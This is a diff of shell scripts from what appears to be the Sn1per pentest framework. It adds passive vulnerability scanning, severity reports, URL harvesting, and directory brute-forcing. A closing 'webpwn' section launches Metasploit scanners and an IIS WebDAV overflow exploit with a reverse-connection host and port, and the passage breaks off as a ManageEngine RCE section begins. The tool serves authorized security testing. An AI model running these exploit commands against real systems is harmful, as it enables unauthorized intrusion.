cat $FILENAME | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out || echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
else
|
||||
#echo $file
|
||||
if [[ "$SSL" == "true" ]]; then
|
||||
cat $FILENAME | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: https://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-https-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
else
|
||||
cat $FILENAME | egrep $GREP_OPTIONS "$MATCH" $SECONDARY_COMMANDS >/tmp/match.out && echo "[+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g")" | tee "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null && /bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out) (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" && echo "[xerosecurity.com] •?((¯°·._.• [+] [$SEVERITY] $VULN_NAME - URL: http://$TARGET:$PORT/$URI - EVIDENCE: $(head -n 1 /tmp/match.out | sed -r "s/</\&lh\;/g") (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt || rm -f "$LOOT_DIR/vulnerabilities/sc0pe-$TARGET-http-$OUTPUT_NAME.txt" 2> /dev/null
|
||||
fi
|
||||
fi
|
||||
rm -f /tmp/match.out 2> /dev/null
|
||||
done
|
||||
|
|
@ -0,0 +1,24 @@
|
|||
echo "====================================================================================" | tee $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
CRITICAL_VULNS=$(egrep CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
|
||||
HIGH_VULNS=$(egrep HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
|
||||
MEDIUM_VULNS=$(egrep MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
|
||||
LOW_VULNS=$(egrep LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
|
||||
INFO_VULNS=$(egrep INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | wc -l)
|
||||
VULN_SCORE=$(($CRITICAL_VULNS*5+$HIGH_VULNS*4+$MEDIUM_VULNS*3+$LOW_VULNS*2+$INFO_VULNS*1))
|
||||
echo "•?((¯°·..• Sc0pe Vulnerability Report by @xer0dayz •._.·°¯))؟• " | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "Critical: $CRITICAL_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "High: $HIGH_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "Medium: $MEDIUM_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "Low: $LOW_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "Info: $INFO_VULNS" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "Score: $VULN_SCORE" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "$VULN_SCORE" 2> /dev/null > $LOOT_DIR/vulnerabilities/vulnerability-risk-$TARGET.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h CRITICAL $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h HIGH $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h MEDIUM $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h LOW $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
egrep -h INFO $LOOT_DIR/vulnerabilities/sc0pe-$TARGET-*.txt 2> /dev/null | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
echo "====================================================================================" | tee -a $LOOT_DIR/vulnerabilities/vulnerability-report-$TARGET.txt 2> /dev/null
|
||||
|
||||
|
|
@ -174,9 +174,9 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 http://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R http://$TARGET | tee $LOOT_DIR/web/headers-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure http://$TARGET > $LOOT_DIR/web/websource-http-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS http://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port80.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -247,7 +247,12 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=http://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-http-$TARGET.txt 2> /dev/null
|
||||
echo " "
|
||||
fi
|
||||
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
|
|
@ -263,6 +268,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
mv -f $LOOT_DIR/web/spider-$TARGET.txtr $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
|
|
@ -280,12 +286,12 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,500,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u http://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
|
|
@ -319,6 +325,14 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
cd $LOOT_DIR
|
||||
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium http://$TARGET:80
|
||||
fi
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
fi
|
||||
|
||||
if [[ -z "$port_443" ]];
|
||||
|
|
@ -335,9 +349,9 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN curl --connect-timeout=5 --max-time 3 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null$RESET"
|
||||
fi
|
||||
wget -qO- -T 1 --connect-timeout=5 --read-timeout=10 --tries=1 https://$TARGET | perl -l -0777 -ne 'print $1 if /<title.*?>\s*(.*?)\s*<\/title/si' >> $LOOT_DIR/web/title-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R https://$TARGET | tee $LOOT_DIR/web/headers-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 -s -R -L --insecure https://$TARGET > $LOOT_DIR/web/websource-https-$TARGET.txt 2> /dev/null
|
||||
curl --connect-timeout 5 --max-time 10 -I -s --insecure -R -X OPTIONS https://$TARGET | grep Allow\: | tee $LOOT_DIR/web/http_options-$TARGET-port443.txt 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DISPLAYING META GENERATOR TAGS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -408,6 +422,12 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
curl -sX GET "http://api.hackertarget.com/pagelinks/?q=https://$TARGET" | egrep -v "API count|no links found|input url is invalid|API count|no links found|input url is invalid" | tee $LOOT_DIR/web/hackertarget-https-$TARGET.txt 2> /dev/null
|
||||
echo " "
|
||||
fi
|
||||
if [[ "$GUA" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED FETCHING GUA URLS $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
gua2 -subs $TARGET | tee $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null
|
||||
fi
|
||||
if [[ "$BLACKWIDOW" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING ACTIVE WEB SPIDER $RESET"
|
||||
|
|
@ -423,6 +443,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
cat $LOOT_DIR/web/waybackurls-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/hackertarget-*-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/passivespider-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
cat $LOOT_DIR/web/gua-$TARGET.txt 2> /dev/null >> $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sed -ir "s/</\&lh\;/g" $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
sort -u $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null > $LOOT_DIR/web/spider-$TARGET.sorted 2>/dev/null
|
||||
mv $LOOT_DIR/web/spider-$TARGET.sorted $LOOT_DIR/web/spider-$TARGET.txt 2>/dev/null
|
||||
|
|
@ -439,12 +460,12 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
echo -e "$OKRED RUNNING FILE/DIRECTORY BRUTE FORCE $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
if [[ "$VERBOSE" == "1" ]]; then
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
echo -e "$OKBLUE[$RESET${OKRED}i${RESET}$OKBLUE]$OKGREEN python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,500,502,503,504 -F -e php,asp,aspx,bak,zip,tar.gz,html,htm $RESET"
|
||||
fi
|
||||
if [[ "$DIRSEARCH" == "1" ]]; then
|
||||
touch $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
cp $LOOT_DIR/web/dirsearch-$TARGET.txt $LOOT_DIR/web/dirsearch-$TARGET.bak 2> /dev/null
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,502,503,504 -F -e * -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
python3 $PLUGINS_DIR/dirsearch/dirsearch.py -u https://$TARGET -w $WEB_BRUTE_STEALTH -x 400,404,405,406,429,500,502,503,504 -F -e "/" -t $THREADS --random-agents --plain-text-report=$LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > /dev/null && cat $LOOT_DIR/web/dirsearch-$TARGET.txt
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* 2> /dev/null
|
||||
cat $PLUGINS_DIR/dirsearch/reports/$TARGET/* > $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null
|
||||
sort -u $LOOT_DIR/web/dirsearch-$TARGET.txt 2> /dev/null > $LOOT_DIR/web/dirsearch-$TARGET.sorted 2> /dev/null
|
||||
|
|
@ -499,7 +520,18 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
python2 $INSTALL_DIR/bin/webscreenshot.py -r chromium https://$TARGET:443
|
||||
fi
|
||||
echo -e "$OKRED[+]$RESET Screenshot saved to $LOOT_DIR/screenshots/$TARGET-port443.jpg"
|
||||
if [[ "$SC0PE_VULNERABLITY_SCANNER" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING SC0PE PASSIVE WEB VULNERABILITY SCAN $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
SSL="false"
|
||||
source $INSTALL_DIR/modes/sc0pe-passive-scan.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
fi
|
||||
fi
|
||||
|
||||
source modes/sc0pe.sh
|
||||
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
|
|
@ -526,6 +558,7 @@ if [[ "$MODE" = "stealth" ]]; then
|
|||
mv $LOOT_DIR/scans/running-$TARGET-stealth.txt $LOOT_DIR/scans/finished-$TARGET-stealth.txt 2> /dev/null
|
||||
rm -f $INSTALL_DIR/.fuse_* 2> /dev/null
|
||||
sort -u $LOOT_DIR/ips/ips-all-unsorted.txt 2> /dev/null > $LOOT_DIR/ips/ips-all-sorted.txt 2> /dev/null
|
||||
|
||||
if [[ "$LOOT" = "1" ]]; then
|
||||
loot
|
||||
fi
|
||||
|
|
|
|||
|
|
@ -91,8 +91,9 @@ if [[ "$MODE" = "vulnscan" ]]; then
|
|||
omp -h $OPENVAS_HOST -p $OPENVAS_PORT -u $OPENVAS_USERNAME -w $OPENVAS_PASSWORD -G | grep $TARGET
|
||||
fi
|
||||
fi
|
||||
source modes/sc0pe.sh
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED DONE $RESET"
|
||||
echo -e "$OKRED SCAN COMPLETE! $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo "$TARGET" >> $LOOT_DIR/scans/updated.txt
|
||||
mv $LOOT_DIR/scans/running-$TARGET-vulnscan.txt $LOOT_DIR/scans/finished-$TARGET-vulnscan.txt 2> /dev/null
|
||||
|
|
|
|||
|
|
@ -1,241 +1,245 @@
|
|||
if [[ "$SLACK_NOTIFICATIONS" == "1" ]]; then
|
||||
/bin/bash "$INSTALL_DIR/bin/slack.sh" "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•"
|
||||
echo "[xerosecurity.com] •?((¯°·._.• Started Sn1per webpwn scan: $TARGET [$MODE] (`date +"%Y-%m-%d %H:%M"`) •._.·°¯))؟•" >> $LOOT_DIR/scans/notifications.txt
|
||||
|
||||
if [[ "$MSF_LEGACY_WEB_EXPLOITS" == "1" ]]; then
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING JBOSS VULN SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/jboss_vulnscan; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-jboss_vulnscan.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING HTTP PUT UPLOAD SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/http_put; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; set PATH /uploads/; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-http_put.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING WEBDAV SCANNER $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use scanner/http/webdav_scanner; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; run; use scanner/http/webdav_website_content; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-webdav_website_content.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MICROSOFT IIS WEBDAV ScStoragePathFromUrl OVERFLOW $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
msfconsole -q -x "use exploit/windows/iis/iis_webdav_scstoragepathfromurl; setg RHOST "$TARGET"; setg RHOSTS "$TARGET"; setg RPORT "$PORT"; setg SSL "$SSL"; setg LHOST "$MSF_LHOST"; setg LPORT "$MSF_LPORT"; run; exit;" | tee $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw
|
||||
sed -r "s/\x1B\[([0-9]{1,2}(;[0-9]{1,2})?)?[mGK]//g" $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw > $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.txt 2> /dev/null
|
||||
rm -f $LOOT_DIR/output/msf-$TARGET-port$PORT-iis_webdav_scstoragepathfromurl.raw 2> /dev/null
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
echo -e "$OKRED RUNNING MANAGEENGINE DESKTOP CENTRAL RCE EXPLOIT $RESET"
|
||||
echo -e "${OKGREEN}====================================================================================${RESET}•x${OKGREEN}[`date +"%Y-%m-%d](%H:%M)"`${RESET}x•"
|
||||
